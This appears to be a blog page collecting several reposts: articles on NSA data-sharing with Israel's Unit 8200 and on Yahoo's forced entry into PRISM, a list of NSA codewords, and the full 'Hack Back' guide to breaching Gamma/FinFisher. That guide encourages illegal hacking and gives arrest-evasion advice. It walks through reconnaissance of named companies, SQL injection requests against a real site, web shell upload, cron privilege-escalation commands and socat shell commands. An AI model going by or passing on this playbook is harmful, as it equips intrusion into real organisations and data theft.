Among his most shocking discoveries, he told me, was the fact that the NSA was routinely passing along the private communications of Americans to a large and very secretive Israeli military organization known as Unit 8200. This transfer of intercepts, he said, included the contents of the communications as well as metadata such as who was calling whom.

Typically, when such sensitive information is transferred to another country, it would first be “minimized,” meaning that names and other personally identifiable information would be removed. But when sharing with Israel, the NSA evidently did not ensure that the data was modified in this way.

Mr. Snowden stressed that the transfer of intercepts to Israel contained the communications—email as well as phone calls—of countless Arab- and Palestinian-Americans whose relatives in Israel and the Palestinian territories could become targets based on the communications. “I think that’s amazing,” he told me. “It’s one of the biggest abuses we’ve seen.”

As of last week, exactly 43 ex-members of Unit 8200—many young and active reservists who could theoretically be called again to serve Israel at a moment’s notice—passionately agree.

In an act of protest that had been planned well in advance of this summer’s brutal bombing campaign in Gaza (which you may have heard killed 2,100 Palestinians and turned Gaza City into the lunar ruins of an ancient alien race), the young members of Unit 8200 drafted a long letter publicly refusing to participate in any further intelligence gathering activities against the Palestinians.

“The Palestinian population under military rule is completely exposed to espionage and surveillance by Israeli intelligence. It is used for political persecution and to create divisions within Palestinian society by recruiting collaborators,” the letter says. Adding, “In many cases, intelligence prevents defendants from receiving a fair trial in military courts, as the evidence against them is not revealed.”

“Contrary to Israeli citizens or citizens of other countries,” whose rights are protected under law, the letter points out, “there’s no oversight on methods of intelligence or tracking and the use of intelligence information against the Palestinians, regardless if they are connected to violence or not.”

London-based newspaper The Guardian interviewed several of the unit’s conscientious objectors under the condition of anonymitywhich was requested not out of fear of persecution, but out of the desire to comply with Israeli law. (Only the copies of the letter sent to their unit commander used the objectors’ full names.)

The individual accounts made by the former military intelligence agents,published by the Guardian and Israel’s Yediot Aharonot newspaper, are numerous and depressingly perverse.

Among the personal statements, agents disclosed that the majority of Unit 8200’s operations in Palestine targeted “innocent people unconnected to any military activity.” The unit was instructed to keep any personal information potentially embarrassing or damaging to a Palestinian’s life, including sexual preferences, extramarital affairs, financial trouble, family illnesses, or anything else that could be “used to extort/blackmail the person and turn them into a collaborator.” The private “sex talk” intercepted by Palestinians (in what’s becoming a gross trend for these surveillance scandals) were allegedly passed around by certain members of the unit for titters/yucks.

One member, referred to as “D” by the Guardian, formerly a 29-year-old captain who served in the unit for eight years, told the paper that part of his decision to protest came from the dawning realization that his actions were really no different than those of any totalitarian government’s secret police.

“It was when I realized that what I was doing was the same job that the intelligence services of every undemocratic regime are doing,” he said.

There have been many precursors, both historically and more recently, to this secretive alliance between Israeli and U.S. intelligence agencies. Back in Mad Men times, the CIA’s director of counter-intelligence, legendary super-spook James Angleton, practically contracted all of the CIA’s North African operations to the Mossad along with a generous aid package, and has often been said to have helped found their agency in 1951. During the more recent disclosures regarding the NSA’s (basically illegal) surveillance program STELLAR WIND, agency whistleblowers revealed that two Israeli companies, Verint and Narus, were contracted to manage the actual bugging of America’s telecommunications network.

Apart from the Mossad’s long, aggressive history of spying on the United States, the arrangement also provoked concerns due to corruption within one of the firms; Verint’s founder and former chairman Kobi Alexander was added to the FBI “most wanted list” in 2006 regarding various forms of stock fraud and fought against extradition for many years. Some former agency employees have also reported that a mid-level NSA employee friendly with Israeli intelligence unilaterally decided to hand over advanced analytical and data mining software that the agency had developed internally for its own international eavesdropping operations. (According to a piece by James Bamford in WIRED, that software is now also in the hands of many private Israeli companies.)

In all that context, it’s true that this recent news isn’t exactly surprising or shockingthe kind of lame, bullshit “take” pundits and anonymous commenters always love trotting out to congratulate themselves for their knowledgeable cynicism. (Seriously: Good for you guys.)

What it still isobviously and regardless of this contextis abhorrent and genuinely scandalous for a country, like Israel, that loves positioning itself as a bastion of democracy in the autocratic Middle East.

Perhaps, we should start looking for some fresh perspectives on how best to resolve this ongoing humanitarian crisis.

[photo of an Israeli Defense Force Situation Room—really actually already redacted like that—via the IDF Spokesman’s Office by way of Haaretz; June 2014 photo of an Israeli soldier carrying a computer tower seized during the search for three Israeli teenagers believed to be kidnapped by Palestinian militants, by Hazem Bader/AFP/Getty Images]

via Gawker

To contact the author, email [email protected], pgp public key.

The NSA Was Going to Fine Yahoo $250K a Day If It Didn’t Join PRISM

The NSA Was Going to Fine Yahoo $250K a Day If It Didn’t Join PRISM

yahoo-nsa-prism-fineWhen we first learned about NSA metadata collection, we wondered how readily the biggest tech companies acquiesced to the government. Today we start to find out. This is the story of how Yahoo was coerced into PRISM, as told by court documents cited by the Washington Post today.

According to the documents, corroborated by a blog post made public today by Yahoo—the U.S. government first approached the company in 2007 asking for user metadata. The request was unprecedented: The U.S. government was no longer interested in obtaining a court review before requesting metadata on an individual target. The order simply asked for data on targets located outside of the U.S. at the time, be they foreign or U.S. citizens.

Yahoo challenged the government requests several times, citing the limits of the U.S. Constitution, but was denied in the Foreign Intelligence Court of Review, the “secret courts” that oversee surveillance requests regarding national security. The repeated denials, plus the threat of losing $250,000 a day, forced Yahoo to comply with the NSA’s PRISM program.

For its part, the U.S. government used Yahoo as an example to coerce other American tech giants, sharing the rulings against Yahoo with companies like Google, Facebook, and Apple.

This information comes to light today, as roughly 1,500 pages of documents pertaining to Yahoo’s failed legal battle were released by Federal Judge William C. Bryson, who presides over the Foreign Intelligence Surveillance Court of Review. Yahoo requested the unsealing of the documents, and the company’s Ron Bell says in this blog post that Yahoo is working to make these never-before-released documents available on Tumblr.

Now that the courts are unsealing documents surrounding PRISM and other national surveillance programs, it’s possible that we’ll hear about other tech companies and whether they resisted the NSA’s requests for sweeping data dumps. Judging by what we’ve learned today, Yahoo tried to stick up for its users’ privacy—until it couldn’t afford to. [The Washington Post]

Hack Back: A DIY Guide for Those Without the Patience to Wait for Whistleblowers

Hack Back: A DIY Guide for Those Without the Patience to Wait for Whistleblowers

gamma-finfisher-hacked-tool

 

–[ 1 ]– Introduction

I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you’ve learned the basics you’ll realize this
really is easier than filing a FOIA request.

–[ 2 ]– Staying Safe

This is illegal, so you’ll need to take same basic precautions:

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it’s better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy
here.

[0] https://truecrypt.ch/downloads/
[1] https://www.whonix.org/wiki/Download#Install_Whonix

As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.

NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you’ll want a public IP address to
receive connect back shells. I recommend using servers you’ve hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you’re running will
have a nice fast connection to your target.

–[ 3 ]– Mapping out the target

Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.

[0] http://ha.ckers.org/fierce/

For an example let’s take Blackwater. We start out knowing their homepage is at
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com

Now we do whois lookups and find the homepage of www.academi.com is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: 67.238.84.224 – 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd

Doing a whois lookup on academi.com reveals it’s also registered to the same
address, so we’ll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
“850 Puddin Ridge Rd” inurl:ip-address-lookup
“850 Puddin Ridge Rd” inurl:domaintools

Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you’ve found everything.

Also just google the organization and browse around its websites. For example on
academi.com we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com

If you repeat the whois lookups and such you’ll find academiproshop.com seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
was simply a whois lookup of finfisher.com which found it registered to the name
“FinFisher GmbH”. Googling for:
“FinFisher GmbH” inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com

…so now you’ve got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.

–[ 4 ]– Scanning & Exploiting

Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.

Now for each service you find running:

1) Is it exposing something it shouldn’t? Sometimes companies will have services
running that require no authentication and just assume it’s safe because the url
or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.

2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
default password.

3) Is it running an old version of software vulnerable to a public exploit?

Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:

1) Browse them. Especially on subdomains that fierce finds which aren’t intended
for public viewing like test.company.com or dev.company.com you’ll often find
interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it’s time to move
on to finding a new vulnerability:

5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.

6) For the non-custom software they’re running, get a copy to look at. If it’s
free software you can just download it. If it’s proprietary you can usually
pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that’s easier to hack, and get a copy from them.

[0] http://www.cirt.net/nikto2
[1] http://www.morningstarsecurity.com/research/whatweb
[2] http://wpscan.org/
[3] https://code.google.com/p/cms-explorer/
[4] http://sourceforge.net/projects/joomscan/
[5] https://code.google.com/p/zaproxy/

For finsupport.finfisher.com the process was:

* Start nikto running in the background.

* Visit the website. See nothing but a login page. Quickly check for sqli in the
login form.

* See if WhatWeb knows anything about what software the site is running.

* WhatWeb doesn’t recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
software.

* I view the page source to find a URL I can search on (index.php isn’t
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
allinurl:”Scripts/scripts.js.php”

* I find there’s a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum
up views: “In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group…”

But it’s really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:

* google allinurl:”Scripts/scripts.js.php” and find the other sites

* Notice they’re all sql injectable in the first url parameter I try.

* Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with
the option –tamper=’tamper/modsecurityversioned.py’

* Acquire the admin login information, login and upload a php shell [1] (the
check for allowable file extensions was done client side in javascript), and
download the website’s source code.

[0] http://sqlmap.org/
[1] https://epinna.github.io/Weevely/

Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in
javascript, and if you’re unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.

[0] http://www.dvwa.co.uk/

Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
sqli (it’s nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it’s
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap –file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support
tickets, and there’s no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I’m in!

–[ 5 ]– (fail at) Escalating

___________
< got r00t? >
———–
\ ^__^
\ (oo)\_______
(__)\ )\/\
||—-w |
|| ||
^^^^^^^^^^^^^^^^

Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].

[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
[1] https://code.google.com/p/unix-privesc-check/

finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer

so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

wait an hour, and ….nothing. Turns out that while the cron process is running
it doesn’t seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn’t update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that’s probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn’t get much of anything new, so I move
on to the rest of the network.

–[ 6 ]– Pivoting

The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.

The only interesting thing I could get on finsupport’s local network was another
webserver serving up a folder called ‘qateam’ containing their mobile malware.

–[ 7 ]– Have Fun

Once you’re in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there’s no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.

It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make due with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
already so I can move on to step 2!

–[ 8 ]– Other Methods

The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There’s no one right way, and any method that works is as good as
any other. The other main ways that I’ll state without going into detail are:

1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don’t
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There’s also
metasploit browser autopwn, but you’ll probably have better luck with no
exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: “Social Engineering”. This is probably the way to go if you don’t know
too much about computers, and it really is all it takes to be a successful
hacker [0].

[0] https://www.youtube.com/watch?v=DB6ywr9fngU

–[ 9 ]– Resources

Links:

* https://www.pentesterlab.com/exercises/
* http://overthewire.org/wargames/
* http://www.hackthissite.org/
* http://smashthestack.org/
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
* http://www.phrack.com/
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
(all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.
* http://www.dest-unreach.org/socat/
Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It’s also useful for setting up weird pivots and all kinds of other stuff.

Books:

* The Web Application Hacker’s Handbook
* Hacking: The Art of Exploitation
* The Database Hacker’s Handbook
* The Art of Software Security Assessment
* A Bug Hunter’s Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated

Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.

–[ 10 ]– Outro

You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
customers are targeting and with what purpose that makes them evil. That’s not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it’s cheaper to attack than to defend it’s harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!

Raw List of NSA Nicknames and Codewords

Raw List of NSA Nicknames and Codewords

istock_000004093101small

Below is a listing of nicknames and codewords related to US Signals Intelligence (SIGINT) and Communications Security (COMSEC). Most of them are from the NSA, some are from other government or military agencies. Some of them also have an abbreviation which is shown in brackets.

NICKNAMES are generally unclassified. NSA uses single word nicknames, outside NSA they usually consist of two separate words, with the first word selected from alphabetical blocks that are assigned to different agencies by the Joint Staff. Usually, nicknames are printed using all capital letters.

CODEWORDS are always classified and always consist of a single word. Active codewords, or their three-letter abbreviations, which identify a classification compartment always need to be shown in the classification or banner line. Normally, codewords are printed using all capital letters.

Due to very strict secrecy, it’s not always clear whether we see a nickname or a codeword, but terms mentioned in public sources like job descriptions are of course unclassified nicknames.

Please keep in mind that a listing like this will always be work in progress (this list has been copied on some other websites and forums, but only this one is being updated frequently!).

See also the lists of Abbreviations and Acronyms and GCHQ Nicknames and Codewords

A

ACIDWASH – Covert access point for a mobile phone network in Afghanistan

ACORN – Retired SIGINT product codeword

ACCORDIAN – Type 1 Cryptographic algorithm used in a number of crypto products

AETHER – ONI tool “to correlate seemingly disparate entities and relationships, to identify networks of interest, and to detect patterns”

AGILITY – NSA internet information tool or database

AGILEVIEW – NSA internet information tool or database

AIRGAP – Database which deals with priority DoD missions

AIRHANDLER – NSA-G operations center for producing intelligence from Afghanistan

AIRSTEED – Cell phone tracking program of the Global Access Operations (GAO)

AIRWOLF – ?

ALAMITO – The mission of Mexico at the United Nations in New York

ALPHA – Retired SIGINT Exchange Designator for Great Britain

ALTEREGO – A type of Question-Focused Dataset based on E.164

AMBERJACK – SIGINT/EW collection and exploitation system

AMBLE – Retired SIGINT product codeword

AMBULANT (AMB) – SI-ECI compartment related to the BULLRUN program

ANCHORY – NSA software system which provides web access to textual intelligence documents

ANGRYNEIGHBOR – Family of radar retro-reflector tools used by NSA’s TAO division

APALATCHEE – The EU mission in New York

APERIODIC – SI-ECI compartment related to the BULLRUN program

APEX – IP packet reconstruction tool(?)

APPLE1 – Upstream collection site

APSTARS – NSA tool that provides “semantic integration of data from multiple sources in support of intelligence processing”

ARKSTREAM – Implant used to reflash BIOS, installed by remote access or intercepted shipping

ARTIFICE – SSO corporate partner (foreign?)

AUTOSOURCE – NSA tool or database

AQUACADE – A class of SIGINT spy satellites (formerly RHYOLITE)

AQUADOR – Merchant ship tracking tool

ARCA – SIGINT Exchange Designator for ?

ARGON – Satellite mapping program

ARTIFICE – SSO corporate partner under the STORMBREW program

ASPHALT – Project to increase the volume of satellite intercepts at Menwith Hill Station

ASPHALT-PLUS – See above

ASSOCIATION – NSA analytical tool or database

ATALANTA – EU anti-piracy operation

ATLAS – CSEC database

AUNTIE – SI-ECI compartment related to the BULLRUN program

AUTO ASSOCIATION – Second party database

B

BAMBOOSPRING – ?

BANANAGLEE – Software implant that allows remote Jetplow firmware installation

BANISTER – The Columbian trade bureau in New York

BANYAN – NSA tactical geospatial correlation database

BASECOAT – Program targeting the mobile phone network on the Bahamas

BASTE – Retired SIGINT product codeword

– Type 1 Block cipher algorithm, used with many crypto products

BEACHHEAD – Computer exploit delivered by the FERRETCANON system

BEAMER – ?

BELLTOPPER – NSA database

BELLVIEW – SIGINT reporting tool

– List of personnel cleared for access to highly sensitive information or operations

BINOCULAR – Former NSA intelligence dissemination tool

BIRCHWOOD – Upstream collection site

BLACKBOOK – ODNI tool for large-scale semantic data analysis

BLACKFOOT – The French mission at the United Nations in New York

BLACKHEART – Collection through FBI implants

BLACKMAGIC – NSA database or tool

BLACKPEARL – NSA database of survey/case notations(?)

BLACKWATCH – NSA reporting tool

– Program for intercepting phone and internet traffic at switches in the US (since 1978)

BLINDDATE – Hacking tools for WLAN collection, plus GPS

BLUEANCHOR – Partner providing a network access point for the YACHTSHOP program

BLUEFISH (BLFH) – Compartment of the KLONDIKE control system

BLUEZEPHYR – Sub-program of OAKSTAR

BOOTY – Retired SIGINT product codeword

– DNI and DNR metadata visualization tool

BOURBON – Joint NSA and GCHQ program for breaking Soviet encryption codes (1946-?)

BROKENRECORD – NSA tool

BROKENTIGO – Tool for computer network operations

BROADSIDE – Covert listening post in the US embassy in Moscow

BROOMSTICK – ?

BRUNEAU – Operation against the Italian embassy in Washington DC using LIFESAVER techniques

BRUTUS – Tool or program related to MARINA

BUFFALOGREEN – The name ORANGECRUSH was known to Polish partners

BULLDOZER – PCI bus hardware implant on intercepted shipping

– An NSA COI for decryption of network communications

BULLSEYE – NSG High-Frequency Direction-Finding (HF-DF) network (now called CROSSHAIR)

(BYE) – Retired SCI control system for overhead collection systems (1961-2005)

BYZANTINE – First word of nicknames for programs involving defense against Chinese cyber-warfare and US offensive cyber-warfare

BYZANTINE ANCHOR (BA) – A group of Chinese hackers which compromised multiple US government and defense contractor systems since 2003

BYZANTINE CANDOR (BC) – A group of Chinese hackers which compromised a US-based ISP and at least one US government agency

BYZANTINE FOOTHOLD (BF) – A group of Chinese hackers who attacked various international companies and internet services providers

BYZANTINE HADES (BH) – A concerted effort against Chinese hackers who attacked the Pentagon and military contractors. Probably renamed to the LEGION-series

C

CADENCE – NSA database with tasking dictionaries

CAJABLOSSOM – Automated system for analysing and profiling internet browsing histories

CALYPSO – Remote SATCOM collection facility

CANDYGRAM – Laptop mimicking GSM cell tower, sends out SMS whenever registered target enters its area, for tracking and ID of targets

– Class of COMINT spy satellites (1968-1977)

CANOE – Retired SIGINT product codeword

CANNON LIGHT – Counterintelligence database of the US Army

CAPRICORN – (former?) database for voice data

CAPTIVATEDAUDIENCE – Computer implant plug-in to take over a targeted computer’s microphone and record conversations taking place near the device

CARBOY – Second Party satellite intercept station at Bude, England

CARBOY II – Units of ECHELON which break down satellite links into telephone and telegraph channels

CARILLON – NSA high performance computing center, since 1976 made up of IBM 360s and later four IBM 3033s

CASport – NSA user authorization service

– Computer system capable of automatically analyzing the massive quantities of data gathered across the entire intelligence community

CENTER ICE – Data center for the exchange of intelligence regarding Afghanistan among the members of the 14-Eyes/SSEUR

CENTERMASS – NSA tool or database

CERF CALL MOSES1 – Contact Event Record Format – for certain telephony metadata

CHALKFUN – Analytic tool, used to search the FASCIA database

CHASEFALCON – Major program of the Global Access Operations (GAO)

CHEER – Retired SIGINT product codeword

CHESS – Compartment of TALENT KEYHOLE for the U-2 spy plane

CHEWSTICK – NSA tool or database

CHIMNEYPOOL – Framework or specification of GENIE-compliance for hardware/software implants

CHIPPEWA – Some communications network, involving Israel

CHUTE – Retired SIGINT product codeword

CIMBRI – Probably a metadata database

CINEPLEX – NSA tool or database

CLASSIC BULLSEYE – Worldwide ocean SIGINT surveillance system (1960’s-?)

CLEVERDEVICE – Upstream collection site

CLOUD – NSA database

COASTLINE – NSA tool or database

COBALTFALCON – Sub-program of OAKSTAR

COBRA FOCUS – NSA-G operations center for producing intelligence from Iraq

COGNOS – NSA tool or database

CORDOBA – Type 2 Cryptographic algorithm used in a number of crypto chips

COMBAT SENT – Reconaissance operation

COMMONDEER – Computer exploit for looking whether a computer has security software

COMMONVIEW – NSA database or tool

CONFIRM – NSA database for personell access

CONJECTURE – Network compatible with HOWLERMONKEY

CONTRAOCTAVE – NSA telephony tasking database Used to determine ‘foreigness’

CONVEYANCE – Voice content ingest processor

COPILOT – System that automatically scans digital data for things like language, phone and creditcard numbers and attachments

COPSE – Retired SIGINT product codeword

CORALINE – NSA satellite intercept station at Sabena Seca at Puerto Rico (closed)

CORALREEF – Database for VPN crypto attack data

– A series of photographic surveillance satellites (1959-1972)

CO-TRAVELER – Set of tools for finding unknown associates of intelligence targets by tracking movements based upon cell phone locations

COTTONMOUTH (CM) – Computer implant devices used by NSA’s TAO division

COTTONMOUTH-I (CM-I) – USB hardware implant providing wireless bridge into target network and loading of exploit software onto target PCs, formerly DEWSWEEPER

COTTONMOUTH-II (CM-II) – USB hardware host tap provides covert link over USP into target’s network co-located with long haul relay; dual-stacked USB connector, consists of CM-I digital hardware plus long haul relay concealed in chassis; hub with switches is concealed in a dual stacked USB connector and hard-wired to provide intra-chassis link.

COTTONMOUTH-III (CM-III) – Radio Frequency link for commands to software implants and data infiltration/exfiltration, short range inter-chassis link within RJ45 Dual Stacked USB connector

COURIERSKILL – NSA Collection mission system

COWBOY – The DICTIONARY computer used at the Yakima station of ECHELON

CRANKSHAFT – Codename for Osama bin Laden

CREAM – Retired SIGINT product codeword

CREDIBLE – Transport of intelligence materials to partner agencies

CREST – Database that automatically translates foreign language intercepts in English

CRISSCROSS – Database of telecommunications selectors

CROSSBEAM – GSM module mating commercial Motorola cell with WagonBed controller board for collecting voice data content via GPRS (web), circuit-switched data, data over voice, and DTMF to secure facility, implanted cell tower switch

CROSSHAIR – NSG High-Frequency Direction-Finding (HF-DF) network (formerly BULLSEYE)

CROSSBONES – Analytic tool

CRUMPET – Covert network with printer, server and desktop nodes

CULTWEAVE – Smaller size SIGINT database

CYBERTRANS – A common interface to a number of underlying machine translation systems

CYCLONE Hx9 – Base station router, network in a box using Typhon interface

D

DAFF – Codeword for products of satellite imagery

DAMEON – Remote SATCOM collection facility

DANCINGOASIS (DGO) – SSO program collecting data from fiber optic cables between Europe and the Far East (since 2011)

DANDERSPRITZ – Software tool that spoofs IP and MAC addresses, intermediate redirector node

DANGERMOUSE – Tactical SIGINT collecting system for like cell phone calls

DARDANUS – Remote SATCOM collection facility

DAREDEVIL – Shooter/implant as part of the QUANTUM system

DARKTHUNDER – SSO Corporate/TAO Shaping program

DARKQUEST – Automated FORNSAT survey system

DAUNT – Retired SIGINT product codeword

DECKPIN – NSA crisis cell activated during emergencies

DEEPDIVE – An XKEYSCORE related method

DEITYBOUNCE – Provides implanted software persistence on Dell PowerEdge RAID servers via motherboard BIOS using Intel’s System Management Mode for periodic execution, installed via ArkStream to reflash the BIOS

DELTA – Former SCI control system for intercepts from Soviet military operations

DENIM – Retired SIGINT product codeword

DESPERADO – NSA software tool to prepare reports

DEWSWEEPER – Technique to tap USB hardware hosts

DIKTER – SIGINT Exchange Designator for Norway

DINAR – Retired compartment for intercepts from foreign embassies in Washington

DIONYSUS – Remote SATCOM collection facility

DIRESCALLOP – Method to circumvent commercial products that prevent malicious software from making changes to a computer system

DISCOROUTE – A tool for targeting passively collected telnet sessions

– NSA database for text messages (SMS)

DISTANTFOCUS – A pod for tactical SIGINT and precision geolocation (since 2005)

DIVERSITY – SIGINT Exchange Designator for ?

DOBIE – The South African consulate and mission at the UN in New York

DOCKETDICTATE – Something related to NSA’s TAO division

DOGCOLLAR – A type of Question-Focussed Dataset based on the Facebook display name cookie

DOGHUT – Upstream collection site

DOUBLEARROW – One of NSA’s voice processing databases?

DRAGGABLEKITTEN – An XKEYSCORE Map/Reduce analytic

DREADNOUGHT – NSA operation focused on Ayatollah Khamenei

– Passive collection of emanations (e.g. from printers or faxes) by using a radio frequency antenna

